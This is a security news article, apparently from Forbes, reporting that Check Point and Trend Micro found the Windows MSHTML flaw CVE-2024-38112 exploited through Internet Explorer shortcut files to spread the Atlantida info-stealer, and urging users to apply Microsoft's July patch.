This Microsoft Windows Warning Affects Over 1 Billion Users
NurPhoto via Getty Images
July will not be a good month for Microsoft in terms of security. The images of countless blue screens around the world will remain etched in our memories. And even if the problem is CrowdStrike and not Microsoft, appearances matter. The headlines about power outages also make it all too easy to forget. real Windows threats lurk in the background, according to warnings before CrowdStrike attack. But such oversight can be dangerous.
Earlier this month, before blue screens of death started trending, CheckPoint and Trend Micro both warned that Windows 10 and 11 users were now exposed to a “previously unknown” threat that cleverly awakens Internet Explorer code buried under the hood of hundreds of millions of PCs, exploiting widely open security holes.
ForbesWhatsApp Confirms Biggest iPhone Update of 2024 – Beware of iMessageBy Zak Doffman
As Check Point warned on July 9, “the attackers use special Windows Internet shortcut files that, when clicked, call the legacy Internet Explorer (IE) to visit the attacker-controlled URL… By opening the URL with IE instead of the modern and much more secure Chrome/Edge browser on Windows, the attacker gained significant advantages in exploiting the victim’s computer, despite the computer running the modern Windows 10/11 operating system.”
Then, a few days later, Trend Micro raised the threat level, warning that the vulnerability “was used as a zero-day to access and execute files through disabled Internet Explorer using MSHTML… infecting[ing] victim machines with the Atlantida information stealer, which focuses on stealing system information and sensitive data (such as passwords and cookies) from various applications.
Following Check Point’s disclosure, the US government added the vulnerability to its catalog of known exploit vulnerabilities, warning users that Windows has “an impersonation vulnerability that has a high impact on confidentiality, integrity, and availability.”
The vulnerability has been patched, users just need to make sure their Windows PCs are up to date. CISA is requiring US federal employees to apply this update by July 30th or stop using their PCs. All other organizations, and even individuals, should follow suit given the current Windows threat landscape: according to Check Point, Trend Micro, and CISA, we know that this vulnerability has been exploited in the wild. Even more alarming, Check Point says that these attacks have been ongoing for over 12 months.
Microsoft publicly acknowledged that the vulnerability was exploited in its July update, telling me “we greatly appreciate [Check Point’s] Haifei Li for this research and for reporting it responsibly as part of a coordinated vulnerability disclosure. Customers who have installed the update are already protected.
Check Point told me the vulnerability was “particularly surprising… in exploiting Internet Explorer, which many users may not even realize is on their computer… All Windows users [should] immediately apply the Microsoft patch to protect yourself.”
Ironically, CVE-2024-38112 isn’t the only Internet Explorer vulnerability to make CISA’s list of most dangerous vulnerabilities this month. CVE-2012-4792 also just made its debut: a specific warning about a “user after free” Internet Explorer memory vulnerability despite its end-of-life status. This time, CISA’s mandate is even clearer: “The affected product is end-of-life and should be decommissioned if still in use.”
ForbesSamsung warns millions of Galaxy users: Don’t install these appsBy Zak Doffman
The pre-update risk to PC users is best summed up by Trend Micro, which describes it as “a prime example of how unsupported Windows relics represent an overlooked attack surface that can still be exploited by malicious actors to infect unsuspecting users with ransomware, backdoors, or as a conduit for other types of malware.”
This month’s Windows outage, whatever the cause, has been front-page news. While the CrowdStrike issue was painful and costly, it’s not a cyberthreat in and of itself, though malicious actors are now clearly taking advantage of the confusion. The more stealthy threat, according to CISA’s warning, is exactly the opposite: You won’t know you’ve been hit until it’s too late. So be sure to apply the update, if you don’t already have it.
.jpg)
.webp)
0 Comments